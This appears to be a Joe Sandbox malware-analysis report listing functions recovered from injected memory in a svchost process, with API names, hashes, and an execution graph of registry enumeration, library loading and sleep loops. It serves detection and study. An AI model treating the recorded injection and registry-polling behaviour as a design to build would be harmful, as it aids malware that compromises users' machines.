                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: b74828290f2ae62677b66e179717fd8b661321355523e7ba451828796880c1a7
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: DBF0813234874096F7208BE4E8C5BA96361F748B9DF845020CA4E86954DB2FC64DCB40
                                                                      Function 000001CBD8BDBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 37321554d2df0aa79fc22873e2386afc887469eaa0481ba7fb1d3ff3d9e834d8
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: C0F0AF7125970489FB118FE4E4C6BB92321EB8977AF4402198A6F851E4CF2BC049C780
                                                                      Function 000001CBD8BD3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 3c5f480dda9202fff783b6f139fd1f0141ab971eaac63cb1c0237ba01f6de79c
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: A2F0543068878085FA144BD6B9955A56261AB49FD6F084120DD4F87B15DF2AC445C740
                                                                      Function 000001CBD8BD50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: 32d60e69eea9e2b2788f8227f4ad6006050a75537e6b2dfa38ae953cf35e1181
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: 2902E83225DB8486E760CB95E4917AEB7A1F3C4789F101015EA8F87BA9DFBEC444CB40
                                                                      Function 000001CBD8BD5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 9c1493acfd7b5872a94b8db0ae71fae0010280c453ccaf9609f860de902d1b3d
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: 9C61F83655DB40C6F7608B95E485BAE77A1F388789F105116EA9F87BA8CBBFC440CB40
                                                                      Function 000001CBD8BE4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: f252b24e3e3f9fbba2903bc14e13e79b0561aa045f8524dcd908ab4369d06102
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 1D118232A98F5019FE6615E8D4D7FF619417B683AEF080624A57FC66D68B2BC841C182
                                                                      Function 000001CBD8BB3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 62decd75e8cd862665d9d8c7f09f2ea4bdb99cc7548c456523e92675cecc9a33
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 2511C4726DCB0151FA5411E8E6D3BF910C06B5CB7EF484638A96F862F78B27F848C180
                                                                      Function 000001CBD8BAF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 99ebee8ea45fe0a9786a9c4ed11dd03fcaa3952423eabe6646d82df20e5116f7
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 7061C23668C30042FA658BE5E5C3BFE6EA0E78178EF544515DA0F937A4DBB7C841C288
                                                                      Function 000001CBD8BDAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 7acbc2e4e8793f3fe0f44b886d3766375e5a85e830d565591bd1b1d9b19824ab
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: A5618936608B849AFB109FA5D481BED7BA2F344B8DF045205EE4F57B98DB3AC095C780
                                                                      Function 000001CBD8BDAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 0c549113169c63b82f4eb0439e5f8d0fded427d2edf7ff314c8146e84b243ff3
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 02518E721483809BFB748BE190C5BA97BA2E354B8AF146115DA5FC7AD5CB3BD450C780
                                                                      Function 000001CBD8BAA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: fd0772b57a10f5ee3d03dfca06ca8f8fdafda8dc318c2fb514941a215750b28d
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 7151D236188380CAFB648BD59081BBC77A0F355B8AF046116DA5FC7B95CBBBC450C798
                                                                      Function 000001CBD8BA8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 7dda59274c03c3fa635dd33b5e12994a731da3bfc9d46b6666e8b71b45b3c75c
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 73519132649B008AFB54CBD6E485FA83795F354B9DF508124DE1B83B58EBB7E840C788
                                                                      Function 000001CBD8BA83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: d574a5838cee0a89f3f3a63565909bfd7782941e71e265548c8e5aea6bd2b172
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 6F318D31249B409AF714DF92E886BA937A4F340B8EF058014EE5F83B94DB7BD940C788
                                                                      Function 000001CBD8BE2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: f20432c764ec1e0b106a42a51970bf11a474d24c72dd99a7e8f550ff0ed66ca1
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: E4D1BC72758B808DF712CBE9D481AEC3BB5E354799F004216EE5E97B99DB36C506C380
                                                                      Function 000001CBD8BD14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: 0478c1a3af261ca2c2e0ef0fcd73c2b7d176ce7ca8816933a5e730a685654da8
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: 6A018036548B90DEE706DFE2E8855AA67A1F749F8AF045028DA4F83715DF36C050C780
                                                                      Function 000001CBD8BE2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 66dc8eb791194b220bed5d3989a0fe2ba9d1d817296486305e4d0376b7eb8cdb
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: D791A132648B5089F7629FE584C2BFD2BA8A704B8EF145109EE0F97695DB37C446C780
                                                                      Function 000001CBD8BD7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 26315b277f0833fa29e6206e1a37c947975b73cd93ff35a93702093b29e9861a
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: 24114C32755B0089FB01CBE0E8967A933B4F71976DF441E21DA6E827A4DB7AC198C380
                                                                      Function 000001CBD8BD253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: 0f062c2000fda37f594db2641492732ab4a3e092627b12192f5d619f654c7c9e
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 6771D3362487C195F6349FE59882BF96B9AF389B8AF440025DD0F87B99DB37C945C380
                                                                      Function 000001CBD8BA9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 8a50fd077b55d767147a8b684bd0014825f6ee4c9455cdaf633ba578169a54a8
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 4F616832608B448AFB208FA5D0817ED77A0F344B8DF044216EE6E57B99DBBAD055C784
                                                                      Function 000001CBD8BD2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: a2bfb7fda913f1e1fe19f6c7b4fcb7ee1ffa8c84edc466839910cc72a59897c2
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 3C51073224C7C2A1F6258BE9A1E5BFA6656F38574AF440015CE4F83B5ADB3BD505C7C0
                                                                      Function 000001CBD8BE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: cd8d986b631c472f2e62d269227b9dd1cdefb2696399252b170650b3eb51d930
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: BE41D632319B4085EB21CFA5E4857E977A5F788799F404021EE4EC7794DB3EC401C780
                                                                      Function 000001CBD8BD94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: eebf817035f43bb8bd238e610929092bc7213130e6fb6148e294eab5ce3c98b4
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: 78113032258B4082FB618F55F4407A977E5F788B99F584220DE8E47759DF3EC551CB40
                                                                      Function 000001CBD8BA7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: 8889b0c47ec14da33e3277f015dfdf4e0413e94902c43d1922f8fea6f1334091
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 1BE08671684B4890EF018FA2E8816E833A0DB68B68F489122D95D46321FB39D1F9C341
                                                                      Function 000001CBD8BA73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 377f2ecfa8fe3b999a50dcb3cab1f77f510c3be82b2217139a6f9118ea1a173d
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 57E08671644F4880EF028FA1D4815E87360E768B58F889122C94D46321EB39D1E5C341
                                                                      Function 000001CBD8BD1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 912d26b72c26ad93e34c569596d669a6ded88d197370947b8223babb3ee4b667
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: 9511B235605B4495FA05CBE6A485ABAB3A1F789FCAF085028CE4F87765DF3BC446C380

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 14702 1f2bd13273c 14703 1f2bd13276a 14702->14703 14704 1f2bd132858 LoadLibraryA 14703->14704 14705 1f2bd1328d4 14703->14705 14704->14703 14706 1f2bd161abc 14711 1f2bd161628 GetProcessHeap HeapAlloc 14706->14711 14708 1f2bd161ad2 Sleep SleepEx 14709 1f2bd161acb 14708->14709 14709->14708 14710 1f2bd161598 StrCmpIW StrCmpW 14709->14710 14710->14709 14755 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14711->14755 14713 1f2bd161650 14756 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14713->14756 14715 1f2bd161661 14757 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14715->14757 14717 1f2bd16166a 14758 1f2bd161268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14717->14758 14719 1f2bd161673 14720 1f2bd16168e RegOpenKeyExW 14719->14720 14721 1f2bd1618a6 14720->14721 14722 1f2bd1616c0 RegOpenKeyExW 14720->14722 14721->14709 14723 1f2bd1616e9 14722->14723 14724 1f2bd1616ff RegOpenKeyExW 14722->14724 14759 1f2bd1612bc RegQueryInfoKeyW 14723->14759 14726 1f2bd161723 14724->14726 14727 1f2bd16173a RegOpenKeyExW 14724->14727 14768 1f2bd16104c RegQueryInfoKeyW 14726->14768 14728 1f2bd161775 RegOpenKeyExW 14727->14728 14729 1f2bd16175e 14727->14729 14733 1f2bd161799 14728->14733 14734 1f2bd1617b0 RegOpenKeyExW 14728->14734 14732 1f2bd1612bc 16 API calls 14729->14732 14736 1f2bd16176b RegCloseKey 14732->14736 14737 1f2bd1612bc 16 API calls 14733->14737 14738 1f2bd1617d4 14734->14738 14739 1f2bd1617eb RegOpenKeyExW 14734->14739 14736->14728 14740 1f2bd1617a6 RegCloseKey 14737->14740 14741 1f2bd1612bc 16 API calls 14738->14741 14742 1f2bd161826 RegOpenKeyExW 14739->14742 14743 1f2bd16180f 14739->14743 14740->14734 14746 1f2bd1617e1 RegCloseKey 14741->14746 14744 1f2bd161861 RegOpenKeyExW 14742->14744 14745 1f2bd16184a 14742->14745 14747 1f2bd16104c 6 API calls 14743->14747 14749 1f2bd161885 14744->14749 14750 1f2bd16189c RegCloseKey 14744->14750 14748 1f2bd16104c 6 API calls 14745->14748 14746->14739 14751 1f2bd16181c RegCloseKey 14747->14751 14752 1f2bd161857 RegCloseKey 14748->14752 14753 1f2bd16104c 6 API calls 14749->14753 14750->14721 14751->14742 14752->14744 14754 1f2bd161892 RegCloseKey 